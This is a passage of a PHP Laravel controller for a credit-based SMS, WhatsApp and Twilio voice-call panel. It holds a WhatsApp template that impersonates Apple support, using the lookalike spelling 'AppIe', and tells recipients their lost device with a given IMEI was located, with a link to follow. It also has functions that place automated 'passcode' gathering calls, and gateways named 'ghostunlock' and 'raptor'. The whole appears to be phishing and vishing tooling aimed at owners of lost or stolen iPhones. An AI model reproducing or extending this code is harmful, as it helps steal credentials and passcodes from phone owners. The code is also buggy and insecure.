                if ($user->creditos >= $costo) {
                    $respuesta = json_decode($this->RealCC($mens, $api->api_key, $number, $nombre_sender, $mens));
                    if ($respuesta->status == 'queued') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Mensaje : <br>" . $mens . "<br> para : " . $number . " <br> <p class='success'>Enviado</p>");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Error";
                        $solicitud->contenido = "No Sended Error";
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with("No Sended Error");
                    }
                    Session::flash('mostrar_warning', 'Done');
                    return back()->with("No Sended Error");
                }
                Session::flash('mostrar_warning', 'Done');

                return back()->with("No Sended Error");
            }elseif ($api->name  == "iamserver") { //iamserver
                if ($user->creditos >= $costo) {
                    $respuesta = json_decode($this->iamserver($mens, $api->api_key, $number, $nombre_sender, $mens));
                    if ($respuesta->code == 'ok') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Mensaje : <br>" . $mens . "<br> para : " . $number . " <br> <p class='success'>Enviado</p>");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->numero = $number;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Error";
                        $solicitud->contenido = "No Sended Error";
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with("No Sended Error");
                    }
                    Session::flash('mostrar_warning', 'Done');
                    return back()->with("No Sended Error");
                }
                Session::flash('mostrar_warning', 'Done');

                return back()->with("No Sended Error");
            }

            if ($api->name  == "paneloff") {
                if ($user->creditos >= $costo) {
                    $respuesta = json_decode($this->smspaneloff($mens, $api->api_key, $number, $nombre_sender, $mens));
                    if ($respuesta->status == 'queued') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->numero = $number;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with('mostrar_success', "SMS Done Enviado");
                    } elseif ($respuesta->status == 'error') {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->numero = $number;
                        $solicitud->status = "Error Failed";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'warning');

                        return back()->with('mostrar_warning', "SMS No Enviado");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->numero = $number;
                        $solicitud->status = "Error";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_warning', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                Session::flash('mostrar_warning', 'Done');

                return back()->with("No Sended Error");
            }
            if ($api->name  == "raptor") {

                if ($user->creditos >= $costo) {

                    $output = $respuesta = $this->Raptor($mens, $api->api_key, $number, $nombre_sender, $mens);

                    if ($output == 'Enviado') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Done");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Failed";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_success', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                return back()->with('mostrar_warning', "SMS No Enviado");
                Session::flash('mostrar_warning', 'Done');
            }
            if ($api->name  == "raptor1") {

                if ($user->creditos >= $costo) {

                    $output = $respuesta = $this->Raptor($mens, $api->api_key, $number, $nombre_sender, $mens);

                    if ($output == 'Enviado') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Done");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Failed";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_success', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                return back()->with('mostrar_warning', "SMS No Enviado");
                Session::flash('mostrar_warning', 'Done');
            }

            if ($api->name  == "ghostunlock") {

                if ($user->creditos >= $costo) {

                    $output =  $this->ghostunlock($mens, $api->api_key, $number, $nombre_sender, $mens);
                    if ($output == 'Enviado') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Done");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Failed";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_success', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                return back()->with('mostrar_warning', "SMS No Enviado");
                Session::flash('mostrar_warning', 'Done');
            }
            
            
        if ($api->name  == "whatsapp") {
            //$request->modelo  == model  
            
            
            if($request->Language=="English"){
                
                
$request->mensaje3="AppIe Support
Your lost $request->modelo 
IMEI: $request->imei
has been located today, in order to view its location reply with $request->link

AppIe Support. ";


            }else if($request->Language=="Spanish"){
                $request->mensaje3="AppIe Soporte
Su  $request->modelo en modo perdido 
IMEI: $request->imei
a sido localizado, para mayores informes entre a : $request->link

AppIe Support. ";

            }else{
                
              $request->mensaje3="AppIe Support
Your lost $request->modelo 
IMEI: $request->imei
has been located today, in order to view its location reply with $request->link

AppIe Support. ";
  
            }
            
            
            
                if ($user->creditos >= $costo) {
                    $output =  json_decode($this->whatsapp($request));
                    //  dd($output);
                    if ($output->sent == true) {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = 1;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $request->mensaje3;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');
                        return back()->with("mostrar_success", "Done");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Failed";
                        $solicitud->contenido = $request->mensaje3;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_success', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                return back()->with('mostrar_warning', "SMS No Enviado");
                Session::flash('mostrar_warning', 'Done');
            }
            if ($api->name  == "isender") {

                if ($user->creditos >= $costo) {

                    $output =  json_decode($this->isender($mens, $api->api_key, $number, $nombre_sender, $mens));
                    //  dd($output);
                    if ($output->status == 'success') {
                        $fecha = date("Y-m-d");
                        $user->creditos = $user->creditos - $costo;
                        $user->save();
                        $solicitud = new Solicitud;
                        $solicitud->id_api =   $api->id;
                        $solicitud->id_user = $user->id;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->costo = $costo;
                        $solicitud->contenido = $mens;
                        $solicitud->status = "success";
                        $solicitud->save();
                        Session::flash('mostrar_success', 'Done');

                        return back()->with("mostrar_success", "Done");
                    } else {
                        $solicitud = new Solicitud;
                        $solicitud->id_user = $user->id;
                        $solicitud->costo = $costo;
                        $solicitud->sender_id = $sender->id;
                        $solicitud->id_api = $api->id;
                        $solicitud->status = "Failed";
                        $solicitud->contenido = $mens;
                        $solicitud->save();
                        Session::flash('mostrar_warning', 'Done');

                        return back()->with('mostrar_success', "SMS No Enviado");
                    }
                    return back()->with("No Sended Error");
                }
                return back()->with('mostrar_warning', "SMS No Enviado");
                Session::flash('mostrar_warning', 'Done');
            }
            return back()->with('mostrar_warning', "SMS No Enviado");

            Session::flash('mostrar_warning', 'Done');
        } catch (Exception $e) {
            dd($e);
            return back()->with('mostrar_warning', "SMS No Enviado");

            Session::flash('mostrar_warning', 'Done');
        }
        Session::flash('mostrar_warning', 'Done');
    }




    /**
     * Store a newly created resource in storage.
     * @param  string  $secret
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function hacer_llamada(Request $request)
    {

        try {
            $user = User::find($request->get('user_id'));
            $api = API::find(3);
            $servicio = Servicio::find(1);
            $costo = $servicio->costo;
            if ($user->creditos >= $costo) {
                $lang = $request->get('idioma');
                $to = $request->get('numero');
                $twilio_number = $request->get('numero_twilio');
                foreach (Twilio::all() as $twi) {
                    if ($twilio_number == $twi->twilio_number) {
                        $account_sid = $twi->twilio_account;
                        $auth_token =  $twi->twilio_secret;
                    }
                }
        $callback_url = $actual_link . '/getcalls.php';
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        $quer = "Url=" . urlencode($actual_link . "/" . $lenguaje . ".xml") . "&To=" . urlencode($to) . "&From=" . urlencode($twilio_number) . "&StatusCallback=$actual_link.'/'.getcalls.php&StatusCallbackMethod=POST";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, 'https://api.twilio.com/2010-04-01/Accounts/'.$account_sid.'/Calls.json');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $quer);
        curl_setopt($ch, CURLOPT_USERPWD, $account_sid . ':' . $auth_token);
        $result = curl_exec($ch);
        curl_close($ch);
        $res = json_decode($result, true);
   
                if ($res['status'] == 'queued') {
                    $user->creditos = $user->creditos - 1;
                    $user->save();
                    $solicitud = new Solicitud;
                    $solicitud->id_api =  $servicio->id_api;
                    $solicitud->id_user = $user->id;//numero_twilio
                    $solicitud->numero_twilio = $twilio_number;
                    $solicitud->sender_id = 1;
                    $solicitud->sid = $output['sid'];
                    $solicitud->numero = $to;
                    $solicitud->costo = 1;
                    $solicitud->contenido = "Llamada a : " . $to . " Mensaje:" . $lang;
                    $solicitud->status = $output['status'];
                    $solicitud->save();
                    return back()->with("mostrar_success", 'Llamando a : ' . $to . ' Mensaje:' . $lang . '<br> Costo:' . $solicitud->costo . ' <p class="success">Done</p>');
                } else {
                    $solicitud = new Solicitud;
                    $solicitud->id_api =  $servicio->id_api;
                    $solicitud->id_user = $user->id;
                    $solicitud->sender_id = 1;
                    $solicitud->numero_twilio = $twilio_number;
                    $solicitud->numero = $to;
                    $solicitud->costo = 0;
                    $solicitud->contenido = "Failed Call";
                    $solicitud->status = "Failed";
                    $solicitud->save();
                    return back()->with('mostrar_warning', "Fallo");
                }
            } else {
                return back()->with('mostrar_warning', "Error Grave contacte a SOPORTE ");
            }
        } catch (Exception $e) {
            return back()->with('mostrar_warning', "Error Grave contacte a SOPORTE");
        }
    }



  /**
     * Store a newly created resource in storage.
     * @param  string  $api_key
     * @param  string  $api_secret
     * @param  string  $mens
     * @param  string  $senderid
     * @param  string  $number
     * @param  string  $twilio_number
     * @param  string  $callback_url
     * @param  int  $api_id
     * @return \Illuminate\Http\Response

     */
     
  public function passcodeAPIDev($lenguaje,$api_key, $api_secret, $number, $twilio_number,$callback_url)
  {
   
        try {
            $Servicio = Servicio::find(1);
            $Api = API::find(3);
            $user = User::all();
            $costo = $Servicio->costo;
            foreach (Twilio::all() as $twi) {
                if ($twilio_number == $twi->twilio_number) {
                    $account_sid = $twi->twilio_account;
                    $auth_token =  $twi->twilio_secret;
                   // $callback_url =  $twi->twilio_callback;
                }
            }
            foreach ($user as $us) {
                if ($api_key == $us->api_key && $api_secret == $us->api_secret) {
                    if ($us->creditos >= $costo) {
                        $output = $this->TwilioDev($lenguaje, $number, $account_sid, $auth_token,$twilio_number,$callback_url);
                        if ($output['status'] == 'queued') {
                            $us->creditos = $us->creditos - $costo;
                            $us->save();
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;
                            $solicitud->sid = $output['sid'];

                            //numero_twilio
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Passcode API call to: " . $number;
                            $solicitud->status = $output['status'];
                            $solicitud->save();
                     return $output['sid'];
                        } else {
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Failed Call";
                            $solicitud->status = "Failed";
                            $solicitud->save();
                                             return 0;

                        }
                    }
                }
               
            }
        } catch (Exception $e) {
            $data = [
                'status' => "false",
                'message' => 'Fatal Exception Report to Dev dont worry houston this no cost credits :)' . $e,

            ];
            return response()->json($data, 401, []);
        }  
      
  }


  /**
     * Store a newly created resource in storage.
     * @param  string  $api_key
     * @param  string  $api_secret
     * @param  string  $mens
     * @param  string  $senderid
     * @param  string  $number
     * @param  string  $twilio_number
     * @param  string  $callback_url
     * @param  int  $api_id
     * @return \Illuminate\Http\Response

     */
  public function passcodeAPI($lenguaje,$api_key, $api_secret, $number, $twilio_number)
  {

        try {
            $Servicio = Servicio::find(1);
            $Api = API::find(3);
            $user = User::all();
            $costo = $Servicio->costo;
            foreach (Twilio::all() as $twi) {
                if ($twilio_number == $twi->twilio_number) {
                    $account_sid = $twi->twilio_account;
                    $auth_token =  $twi->twilio_secret;
                    $callback_url =  $twi->twilio_callback;
                }
            }
            foreach ($user as $us) {
                if ($api_key == $us->api_key && $api_secret == $us->api_secret) {
                    if ($us->creditos >= $costo) {
                        $output = $this->Twilio($lenguaje, $number, $account_sid, $auth_token, "+" . $twilio_number);
                        if ($output['status'] == 'queued') {
                            $us->creditos = $us->creditos - $costo;
                            $us->save();
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;
                            $solicitud->sid = $output['sid'];

                            //numero_twilio
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Passcode API call to: " . $number;
                            $solicitud->status = $output['status'];
                            $solicitud->save();
                            $data = [
                                'status' =>  $output['status'],
                                'id' => $us->id,
                                'creditos' => $us->creditos,
                                'mensaje' => "Passcode Call in progress:" . $lenguaje,
                                'user' => $us->name
                            ];
                            return response()->json($data, 200, []);
                        } else {
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Failed Call";
                            $solicitud->status = "Failed";
                            $solicitud->save();
                            $data = [
                                'status' => "false",
                                'message' => 'Call Failed report it',

                            ];
                            return response()->json($data, 401, []);
                        }
                    }
                }
       
            }
        } catch (Exception $e) {
            $data = [
                'status' => "false",
                'message' => 'Fatal Exception Report to Dev dont worry houston this no cost credits :)' . $e,

            ];
            return response()->json($data, 401, []);
        }
    }

    /**
     * Store a newly created resource in storage.
     * @param  string  $api_key
     * @param  string  $api_secret
     * @param  string  $mens
     * @param  string  $senderid
     * @param  string  $number
     * @param  string  $twilio_number
     * @param  string  $callback_url
     * @param  int  $api_id
     * @return \Illuminate\Http\Response

     */
    public function callAPI($api_key, $api_secret, $number, $twilio_number, $callback_url, $lenguaje)
    {

        try {
            $Servicio = Servicio::find(1);
            $Api = API::find(3);
            $user = User::all();
            $costo = $Servicio->costo;
            foreach (Twilio::all() as $twi) {
                if ($twilio_number == $twi->twilio_number) {
                    $account_sid = $twi->twilio_account;
                    $auth_token =  $twi->twilio_secret;
                    $callback_url =  $twi->twilio_callback;
                }
            }
            foreach ($user as $us) {
                if ($api_key == $us->api_key && $api_secret == $us->api_secret) {
                    if ($us->creditos >= $costo) {
                        $output = $this->Twilio($lenguaje, $number, $account_sid, $auth_token, "+" . $twilio_number, $callback_url);
                        $res = json_decode($output, true);
                        if ($res['status'] == 'queued') {
                            $us->creditos = $us->creditos - $costo;
                            $us->save();
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;

                            //numero_twilio
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Llamada a : " . $number;
                            $solicitud->status = $res['status'];
                            $solicitud->save();
                            $data = [
                                'status' => "success",
                                'id' => $us->id,
                                'creditos' => $us->creditos,
                                'mensaje' => "Passcode Call in progress:" . $lenguaje,
                                'user' => $us->name
                            ];
                            return response()->json($data, 200, []);
                        } else {
                            $solicitud = new Solicitud;
                            $solicitud->id_api =  $Servicio->id_api;
                            $solicitud->id_user = $us->id;
                            $solicitud->sender_id = 1;
                            $solicitud->numero = $number;
                            $solicitud->numero_twilio = $twilio_number;
                            $solicitud->costo = $Servicio->costo;
                            $solicitud->contenido = "Failed Call";
                            $solicitud->status = "Failed";
                            $solicitud->save();
                            $data = [
                                'status' => "false",
                                'message' => 'Call Failed report it',

                            ];
                            return response()->json($data, 401, []);
                        }
                    }
                }
                $data = [
                    'status' => "false",
                    'message' => 'Credits enought',

                ];
                return response()->json($data, 401, []);
            }
        } catch (Exception $e) {
            $data = [
                'status' => "false",
                'message' => 'Fatal Exception Report to Dev dont worry houston this no cost credits :)' . $e,

            ];
            return response()->json($data, 401, []);
        }
    }

    /**
     * Store a newly created resource in storage.
     * @param  string  $secret
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function guardar_sender(Request $request)
    {
        $sender = new SenderID();
        $sender->nombre = $request->get('senderid');
        $sender->save();
        Session::flash('mostrar_success', 'Done');

        return back()->with("mostrar_success", "Sender Agregado");
    }

    /**
     * Store a newly created resource in storage.
     * @param  string  $secret
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function agregar_servicio(Request $request)
    {
        $servicio = new Servicio;
        $servicio->nombre = $request->get('nombre');
        $servicio->descripcion = $request->get('descripcion');
        $servicio->id_api = $request->get('api');
        $servicio->id_sender = $request->get('sender');
        $servicio->costo = $request->get('costo');
        $servicio->save();
        Session::flash('mostrar_success', 'Done');

        return back()->with("mostrar_success", "Servicio Agregado");
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $csrf
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function generate(Request $request, $id, $csrf)
    {

        $user = User::find($id);
        $user->api_key = rand_chars("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890", 10, TRUE);
        $user->api_secret = rand_chars("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890", 10, TRUE);
        $user->save();
        return back()->with("mostrar_success", "Nueva Api Key:" . $user->api_key . " Api Secret:" .  $user->api_secret . " Generado");
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function muestra_ejemplo(Request $request, $id)
    {
        $Servicio = Servicio::find($id);
        $SenderID = SenderID::find($Servicio->id_sender);
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        //    public function callAPI($api_key, $api_secret, $number, $twilio_number, $callback_url, $lenguaje)
        $mens = '.$mens.';
        echo '<script>
        $("#muestra_1").attr("type","show"); 
        $("#muestra2").attr("type","hidden");
        $("#muestra3").attr("type","hidden"); 
        document.getElementById("muestra_1").value = " curl_setopt($ch, CURLOPT_URL, ' . $actual_link . '/smsAPI/' . Auth::user()->api_key . '/' . Auth::user()->api_secret . '/' . $Servicio->id_api . '/aqui_pon_numero_telefono/' . $Servicio->id . '/' . $mens . ');"</script>';
    }

    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function muestra_ejemplo2(Request $request, $id)
    {
        //    $Servicio = Servicio::find($id);
        //  $SenderID = SenderID::find($Servicio->id_sender);
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        //    public function callAPI($api_key, $api_secret, $number, $twilio_number, $callback_url, $lenguaje)
        echo '<script>document.getElementById("muestra2").value = "curl_setopt($ch, CURLOPT_URL,' . $actual_link . '/callAPI/' . Auth::user()->api_key . '/' . Auth::user()->api_secret . '/aqui_pon_numero_telefono_destino/numero_origen/' . $id . '/url_respuesta);"
        
        $("#muestra_1").attr("type","hidden"); 
        $("#muestra2").attr("type","show");
        $("#muestra3").attr("type","hidden"); 
        
        </script>';
    }

    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function muestra_ejemplo3(Request $request, $id)
    {
        $actual_link = "http://$_SERVER[HTTP_HOST]";
        $twilio=Twilio::all();
        $contador=1;
        if($twilio==null){
              $numero=Twilio::find(1);
      
        }else{
                          $numero=Twilio::find(4);

        }
        
         echo '<script>
        $("#muestra_1").attr("type","show"); 
        $("#muestra2").attr("type","hidden");
        $("#muestra3").attr("type","hidden"); 
        document.getElementById("muestra_1").value = " curl_setopt($ch, CURLOPT_URL, ' . $actual_link . '/passcodeAPI/'.$id.'/'. Auth::user()->api_key . '/' . Auth::user()->api_secret . '/aqui_pon_numero_telefono/'.$numero->twilio_number.');"</script>';
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function balance_real(Request $request)
    {


        // Find your Account SID and Auth Token at twilio.com/console
        // and set the environment variables. See http://twil.io/secure

        $sid = getenv("");
        $token = getenv("");
        $twilio = new Client($sid, $token);

        $account = $twilio->api->v2010->accounts->create();

        return back()->with($account->balance);
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function agrega_api(Request $request)
    {
        $api = new API();
        $api->nombre_privado = $request->nombre_privado;
        $api->nombre_publico = $request->nombre_publico;
        $api->name = $request->name;
        $api->name = $request->api;
        $api->api_key = $request->api_key;
        $api->save();
        Session::flash('mostrar_success', 'API Agregada');

        echo "<script>Swal.fire({title: 'Success!',text: " . session('mostrar_success') . ",icon: 'success',confirmButtonText: 'Cool'})</script>";
        return back();
    }
    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key
 
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function llamada_passcode(Request $request)
    {
        try {
            $data = request()->json()->all();
            $api = API::find(3);
            $servicio = Servicio::find(1);
            $user = User::find($request->get('user_id'));
            $Twilio = Twilio::all();
            $costo = $servicio->costo;
            $to = "+" . $request->get('numero');

            foreach ($Twilio as $twi) {
                if ($twi->twilio_number == $request->numero_twilio) {
                    $twilio_account = $twi->twilio_account;
                    $twilio_secret = $twi->twilio_secret;
                    $twilio_number = $twi->twilio_number;
                    $twilio_callback = $twi->twilio_callback;
                }
            }
           
            if ($user->creditos >= $costo) {
                $lenguaje = $request->idioma;
                $url= "http://$_SERVER[HTTP_HOST]";
                $quer = "Url=" . urlencode("$url/process_gather/$lenguaje.xml") . "&To=" . urlencode($to) . "&From=" . urlencode("+" . $twilio_number) . "&StatusCallback=$url/response_gather&StatusCallbackMethod=POST";
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, 'https://api.twilio.com/2010-04-01/Accounts/' . $twilio_account . '/Calls.json');
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $quer);
                curl_setopt($ch, CURLOPT_USERPWD, $twilio_account . ':' . $twilio_secret);
                $result = curl_exec($ch);
                if (curl_errno($ch)) {
                    echo 'Error:' . curl_error($ch);
                }
                curl_close($ch);
                $res = json_decode($result, true);
                
                $to = str_replace("+", "", $to);
                $solicitud = new Solicitud;
                $solicitud->id_api =  $servicio->id_api;
                $solicitud->id_user = $user->id;
                $solicitud->sender_id = 1;
                $solicitud->numero = $to;
                $solicitud->numero_twilio = $twilio_number;
                $solicitud->sid = $res['sid'];
                $solicitud->costo = $servicio->costo;
                $solicitud->contenido = "Calling please be patient";
                $solicitud->status = $res['status'];
                $solicitud->save();

                return back()->with("mostrar_success", 'Llamada a Passcode : ' . $to . ' Mensaje:' . $lenguaje . '<br> Costo:' . $solicitud->costo . ' <p class="success">Done</p>');
            } else {
                return back()->with('mostrar_warning', "Error Grave contacte a SOPORTE");
            }
        } catch (Exception $e) {
            return back()->with('mostrar_warning', "Error Temporal contacte a SOPORTE[No se descontaran creditos]");
        }
    }





    /**
     * Store a newly created resource in storage.
     * @param string $secret
     * @param string $number
     * @param string $mens
     * @param string $api_secret
     * @param string $api_key
     * @param string $senderid
     * @param string $chatid

     * @param \Illuminate\Http\Request $request
     * @return \Illuminate\Http\Response
     */
    public function configurar(Request $request)
    {
        $user = User::find($request->get('user'));
        $user->chatid = $request->get('chatid');

        $user->save();

        $configuracion = Configuracion::find($request->get('user'));

        if ($configuracion == null) {
            $configuracion = new Configuracion;
            $configuracion->id_user = $request->get('user');
            $configuracion->bot = $request->get('bot');
            $configuracion->save();
        } else {
            $configuracion->id_user = $request->get('user');
            $configuracion->bot = $request->get('bot');
            $configuracion->save();
        }

        //  dd($user->chatid);
        Session::flash('mostrar_success', 'Done');
        return back();
    }

    /**
     * Store a newly created resource in storage.
     * @param  int  $id
     * @param  string  $number
     * @param  string  $mens
     * @param  string  $secret
     * @param  string  $api_key

     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function agregar_cuenta(Request $request)
    {
        $cuenta = new Twilio;
        $cuenta->id_user = $request->get('user');
        $cuenta->twilio_account = $request->get('account');
        $cuenta->twilio_secret = $request->get('secret');
        $cuenta->twilio_number = $request->get('number'); //twilio_callback
        $cuenta->twilio_callback = $request->get('callback');
        $cuenta->save();
        Session::flash('mostrar_success', 'Done');

        return back();
    }

    /**
